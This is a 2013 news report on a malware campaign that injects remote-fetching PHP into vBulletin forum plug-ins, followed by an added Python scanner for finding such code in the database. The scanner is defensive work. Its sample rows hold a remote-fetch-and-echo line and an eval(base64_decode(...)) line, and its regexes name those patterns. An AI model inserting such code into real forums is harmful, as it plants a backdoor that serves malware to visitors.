vBulletin Forum Becomes Target for Cybercriminals, Warns Sucuri
Sucuri, a known security firm, warns that vBulletin, a well-known forum platform, is becoming a favorite target for web-based attacks launched by cybercriminals, reported blog.sucuri.net in the first week of July 2013.
vBulletin had some severe security flaws in older versions, and when a forum running them is not correctly updated, it ends up hosting malicious software (malware), it notes.
vBulletin is unique in how it stores templates and plug-ins. Unlike WordPress and Joomla, all of its content is saved in the database, which makes cleanup complex for webmasters because they can't use common command-line tools to search through their files. They need to use phpMyAdmin or other database tools to fix those problems.
It uses a plug-in system that hooks into a page at "global start", and this is where the malware resides.
The injected PHP code contacts the domain front adabeupdate.com, retrieves data and sends it to the end user, which allows the malware to be inserted into the forum pages and pushed to visitors through iframes.
Softpedia.com published a report on 8th July, 2013, quoting Daniel Cid, Sucuri CTO, as saying, "The content is remotely generated and changing frequently but the format is same always".
The campaign's size has been estimated from the number of websites that Google found to contain a certain error during a time period when the server hosts one of the malicious domains.
Google indexed more than 15,000 pages, and because not all websites have "display_errors" enabled, experts estimate that the total number of hijacked websites could be ten times higher, that is, around 150,000.
So how do you protect yourself from such web attacks? The most significant step one can take is to keep vBulletin updated.
In addition, users are recommended to check their template and plug-in lists for any malicious content. As the malicious iframes constantly use port numbers 36 and 38, ISPs can protect their customers by blocking these ports externally.
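Because the plug-in code lives in the database rather than in files, the check recommended above has to query the plug-in table instead of searching the filesystem. The following added example (not from Sucuri or vBulletin) shows one way to do that. It assumes a table named `plugin` with columns `pluginid`, `title`, `hookname`, `phpcode` and `active`, uses an in-memory SQLite database with constructed rows in place of the forum's real database, and its indicator patterns are heuristics chosen for illustration.

```python
import re
import sqlite3

# Heuristic indicators of PHP that pulls in or decodes remote content.
# Matches are leads for manual review, not proof of compromise.
INDICATORS = {
    "remote_fetch": re.compile(r"\b(file_get_contents|curl_exec|fsockopen|fopen)\s*\(", re.I),
    "dynamic_exec": re.compile(r"\b(eval|create_function)\s*\(", re.I),
    "decoder": re.compile(r"\b(base64_decode|gzinflate|str_rot13)\s*\(", re.I),
    "iframe": re.compile(r"<\s*iframe\b", re.I),
    "url_with_port": re.compile(r"https?://[^\s'\"/]+:\d+", re.I),
}

def scan_plugins(conn):
    """Return (pluginid, title, hookname, active, [indicators]) for suspicious rows."""
    findings = []
    # Inactive plug-ins are scanned too: a disabled entry can be re-enabled later.
    rows = conn.execute(
        "SELECT pluginid, title, hookname, active, phpcode FROM plugin ORDER BY pluginid"
    )
    for pluginid, title, hookname, active, phpcode in rows:
        hits = sorted(n for n, rx in INDICATORS.items() if rx.search(phpcode or ""))
        if hits:
            findings.append((pluginid, title, hookname, bool(active), hits))
    return findings

def demo_db():
    """Constructed sample rows (assumed schema, placeholder host, not real malware)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE plugin (pluginid INTEGER, title TEXT, hookname TEXT,"
        " phpcode TEXT, active INTEGER)"
    )
    conn.executemany("INSERT INTO plugin VALUES (?,?,?,?,?)", [
        (1, "Forum stats", "forumhome_start", "$stats = fetch_stats();", 1),
        (2, "Cache helper", "global_start",
         "$c = file_get_contents('http://placeholder.example:8080/x'); echo $c;", 1),
        (3, "Old widget", "global_start", "eval(base64_decode($blob));", 0),
    ])
    return conn

if __name__ == "__main__":
    for finding in scan_plugins(demo_db()):
        print(finding)
```

The same patterns can be run over the template table; any hit on a hook that executes on every page deserves a manual read of the stored code.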
» SPAMfighter News - 18-07-2013